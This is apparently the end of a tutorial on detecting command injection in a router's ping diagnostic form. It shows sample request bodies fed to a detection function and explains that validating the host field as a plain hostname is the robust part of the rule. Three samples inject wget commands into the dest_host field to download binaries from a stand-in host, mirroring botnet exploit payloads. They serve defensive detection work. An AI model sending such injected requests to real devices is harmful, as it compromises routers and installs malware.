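SAMPLE_REQUESTS = [
    "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=8.8.8.8",
    "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`/bin/busybox wget http://203.0.113.5/lib/tmp.mips -O t`",
    "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget http://203.0.113.5/bins/t",
    "XWebPageName=status&dest_host=;wget http://203.0.113.5/x",
]

if __name__ == "__main__":
    for body in SAMPLE_REQUESTS:
        print(inspect_request(body))
```

Checking that the field is a plain host is the robust part of the rule; the metacharacter and fetch-tool lists are there to enrich the alert, not to decide it, so a payload that avoids every listed token is still caught as long as it is not a valid hostname or address.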
